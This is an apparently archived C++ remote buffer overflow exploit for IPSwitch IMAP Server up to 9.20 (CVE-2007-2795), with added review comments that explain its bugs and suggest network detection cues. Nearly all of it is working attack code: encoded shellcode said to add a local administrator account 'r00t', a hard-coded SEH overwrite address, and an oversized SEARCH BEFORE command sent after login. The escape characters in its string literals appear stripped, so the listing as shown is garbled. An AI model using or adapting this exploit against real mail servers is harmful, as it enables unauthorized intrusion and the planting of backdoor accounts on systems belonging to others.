
# Title : IPSwitch IMAP Server <= 9.20 Remote Buffer Overflow Exploit
# Published : 2009-09-14
# Author : dmc


/* Ipsbitch.cpp vs Ipswitch IMAP 
 * Tested on: Windows 2000 SP4
 * Ref: CVE-2007-2795
 *
 * Author: Dominic Chell <dmc@deadbeef.co.uk>
 * Found this half written on a VM so decided to finish it.
 *
 * Payload adds a local admin account USER=r00t PASS=r00tr00t!!
 *
 */

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

// Prints the usage banner to stderr.  NOTE(review): the escape sequences in
// this and the other string literals on this page ("n" where "\n" is expected,
// "x90" where "\x90" is expected, '' where '\0' is expected) look like
// backslashes stripped by the page extraction; the literals are left as shown.
#define usage(){ (void)fprintf(stderr, "Ipsbitch vs Ipswitch IMAP <=v9.20n(C) dmc <dmc@deadbeef.co.uk>nnExample: ipsbitch.exe [ip] [port] [user] [password]n");}
// Prints e and then returns -1 *from the calling function*: the macro hides a
// return statement, so every error(...) call in main() below is an early exit
// with status -1, not a continue-after-logging.
#define error(e){ (void)fprintf(stderr,"%sn",e); return -1;}

// USER=r00t PASS=r00tr00t!!
// Bad Chars = 'x00x0ax0dx0bx09x0cx20'
// Encoded with shikata ga nai
//
// Stored as a NUL-terminated string: main() appends it with strcat() and
// sends it with strlen(), so it must not contain a 0x00 byte (hence 0x00 in
// the bad-character list above; the others are IMAP whitespace/line-ending
// bytes the server would treat as delimiters).  Because the blob is encoded
// (per the note above), a static byte signature on it is unlikely to
// generalise; detection is better keyed on the IMAP command framing that
// main() builds around it (a SEARCH BEFORE argument hundreds of bytes long,
// mostly 0x90) than on these bytes.  What the decoded payload does is stated
// only by the author's comment (adds a local admin account) -- not verifiable
// from this listing.
char shellcode[] =
	"xdaxd4x29xc9xb8xb3xfex8bx54xd9x74x24xf4xb1x32"
	"x5fx83xefxfcx31x47x14x03x47xa7x1cx7exa8x2fxa4"
	"x81x51xafxaexc7x6dx24xccxc2xf5x3bxc2x46x4ax23"
	"x97x06x75x52x4cxf1xfex60x19x03xefxb9xddx9dx43"
	"x3dx1dxe9x9cxfcx54x1fxa2x3cx83xd4x9fx94x70x11"
	"x95xf1xf2x46x71xf8xefx1fxf2xf6xa4x54x5bx1ax3a"
	"x80xefx3exb7x57x1bxb7x9bx73xdfx04x7cx4dx29xea"
	"xd5xc9x5exacxe9x9ax21x3cx81xedxbdx91x1ex65xb6"
	"x60xd8xf5x06x18x49x92x76x56x6dx3dx1fxfex90x4b"
	"xd1xa9x93xabx8dx38x08x1ax37xbaxb5x42x98x59x16"
	"xedx83xe9x76x84x38x74x05x46xcdx46xd9xf2x11xd4"
	"x29xcbx25x6ax7ax1bxb2xabx5bx7bx15xeaxdfx3fx49"
	"xcaxf9x9fxe7x77x72xc0x9bx18x19x61x08x81xafx0e"
	"xa5x3dx70x90x21xd0x19x7cxc3x59xaexf2x72xe9x21"
	"x81x07x31xccx55xd8x45x10xb9x59xe1x14xc5x53";

// Value written over the SEH handler slot: the four bytes are the
// little-endian form of the ws2help.dll address noted underneath.  It is a
// hard-coded module address (the header says "Tested on: Windows 2000 SP4")
// and only holds where that DLL loads at that fixed base; randomised module
// bases and handler-validation mitigations on later platforms are exactly
// what invalidates an overwrite of this kind.
char *seh = "xC4x2Ax02x75";
//ws2help.dll - 0x75022AC4 - pop/pop/ret
// Value written over the next-SEH slot: a short forward jump and two NOPs,
// per the author's note below.  Like seh, it is appended with strcat() in
// main(), so neither may contain a 0x00 byte.
char *nextseh = "xebx10x90x90";
// short jmp nop nop

/*
 * Entry point.  argv: [1] server IP in dotted-quad form, [2] port,
 * [3] IMAP user, [4] IMAP password.  Logs in, issues "1 SELECT INBOX", then
 * sends one oversized "2 SEARCH BEFORE" command assembled from the filler,
 * nextseh/seh and shellcode buffers defined above.
 *
 * Returns 0 on the normal path and on usage errors; returns -1 through the
 * error() macro on Winsock failures; and reaches the closing brace with no
 * message at all if the socket never becomes writable within the select()
 * timeout.  The socket is never closed and WSACleanup() is never called --
 * harmless at process exit, but worth knowing when reading the flow.
 */
int main(int argc, char *argv[])
{
	SOCKET s;
	struct fd_set mask;
	struct timeval timeout; 
	struct sockaddr_in server;

	char user[20], pass[20];   // at most 14 chars + terminator of each are used
	char payload[2048];        // the SEARCH command; built with an unchecked strcat() chain below
	char recvbuf[1024];        // zeroed before every recv() of at most 200 bytes, so the "%s" prints below always find a terminator
	// NOTE(review): argc < 4 still admits argc == 4, in which case argv[4] is
	// NULL and strlen(argv[4]) below dereferences it.  For four positional
	// arguments the guard should be argc < 5.
	if(argc < 4)
	{
		usage();
		return 0;
	}

	// Both credentials are length-checked (< 15) before the bounded copy, and
	// the terminator is stored explicitly because strncpy() does not
	// guarantee one.  The '' literal is presumably '\0' with the backslash
	// lost in extraction (as with the "n"/"x90" literals elsewhere on this
	// page); as shown it is not a valid character constant.
	if((strlen(argv[3])<15) && (strlen(argv[4])<15))
	{
		strncpy(user, argv[3], 14);
		strncpy(pass, argv[4], 14);
		user[14] = '';
		pass[14] = '';
	}
	else {
		usage();
		return 0;
	}

	// inet_addr() already yields network byte order; htonl() is applied here
	// and again when filling server.sin_addr below, so on a little-endian host
	// the two swaps cancel.  NOTE(review): neither an inet_addr() failure
	// (INADDR_NONE) nor a non-numeric port (atoi() returns 0) is checked.
	int ipaddr=htonl(inet_addr(argv[1])), port=atoi(argv[2]);;

	fprintf(stderr, "Ipsbitch vs Ipswitch IMAP <=v9.20n(C) dmc <dmc@deadbeef.co.uk>nn");

	// "0 LOGIN <user> <pass>" + line ending.  Worst case is 8 + 14 + 1 + 14
	// bytes plus the line ending, so it fits in 50 with the terminator.  The
	// final strcat(auth, "") is a no-op.  Credentials travel in clear text
	// here (plain IMAP LOGIN, no STARTTLS), which is also how a network
	// sensor would see them.
	char auth[50];
	memset(auth, 0, sizeof(auth));
	memset(recvbuf, 0, sizeof(recvbuf));
	strcat(auth, "0 LOGIN ");
	strcat(auth, user);
	strcat(auth, " ");
	strcat(auth, pass);
	strcat(auth, "rn");
	strcat(auth, "");

	// Command layout: tag + 80 filler bytes + nextseh + seh + 100 filler +
	// shellcode + 300 filler + line ending.  With single-byte "\x90" escapes
	// this is roughly 730 bytes, well inside payload[2048]; nothing in the
	// chain checks that, though, and the 3-character-per-byte text shown on
	// this page would not fit.  From the wire, the observable is a SEARCH
	// BEFORE argument hundreds of bytes long where a date is expected.
	memset(payload, 0, sizeof(payload));
	strcat(payload, "2 SEARCH BEFORE ");
	for(int i=0; i<80; i++) strcat(payload, "x90");
	strcat(payload, nextseh);
	strcat(payload, seh);
	for(int i=0; i<100; i++) strcat(payload, "x90");
	strcat(payload, shellcode);
	for(int i=0; i<300; i++) strcat(payload, "x90");
	strcat(payload, "rn");

	WSADATA info;
    if (WSAStartup(MAKEWORD(2,0), &info)) error("Unable to start WSA");

	s=socket(AF_INET,SOCK_STREAM,0);
	if (s==INVALID_SOCKET) error("[*] socket error");
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ipaddr);   // second htonl(); see the note at ipaddr above
	server.sin_port=htons(port);	

	// The WSAConnect() result is not checked; the code instead treats the
	// socket becoming writable within 3 seconds (mask is passed as the
	// write set of select()) as "connected".  The select() result is not
	// checked either: on timeout FD_ISSET() is false and main() ends silently.
	WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
	timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);

	select(s+1,NULL,&mask,NULL,&timeout);
	if(FD_ISSET(s,&mask))
		{
			// Each exchange is a fixed 1-second wait followed by a single recv()
			// of at most 200 bytes; return values are ignored, so a short or
			// failed read simply prints an empty/partial buffer.  Server data
			// is always passed as a "%s" argument, never as the format string.
			fprintf(stderr, "[*] Connecting to IMAP servern");
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, "[*] Got banner:n%sn", recvbuf);
			memset(recvbuf, 0, sizeof(recvbuf));
			fprintf(stderr, "[*] Authenticating...n");
			if (send(s,auth,strlen(auth),0)==SOCKET_ERROR) error("[*] error sending auth payload");
			// Intended to scrub the credentials from the stack; auth is not
			// read again, so a compiler may elide this plain memset().
			memset(auth, 0, sizeof(auth));
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, "[*] Received:n%sn", recvbuf);
			memset(recvbuf, 0, sizeof(recvbuf));
			fprintf(stderr, "[*] Sending SELECT command...n");
			// The error text here says "auth payload" for the SELECT send -- a
			// copy-paste slip in the message only.
			if (send(s,"1 SELECT INBOXrn",strlen("1 SELECT INBOXrn"),0)==SOCKET_ERROR) error("[*] error sending auth payload");
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, "[*] Received:n%sn", recvbuf);
			memset(recvbuf, 0, sizeof(recvbuf));
			// SELECT INBOX is read twice: the untagged mailbox status lines and
			// the tagged completion presumably arrive in separate segments.
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, "[*] Received:n%sn", recvbuf);
			fprintf(stderr, "[*] Sending exploit payload...n");
			// Success is not checked against any server reply; the closing
			// message is printed unconditionally once send() returns.
			if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) error("[*] error sending exploit payload");
			memset(payload, 0, sizeof(payload));
			fprintf(stderr, "[*] Now try USER=r00t PASS=r00tr00t!!n");
			return 0;
		}
	// Not writable within the timeout: falls off the end with no diagnostic.
}
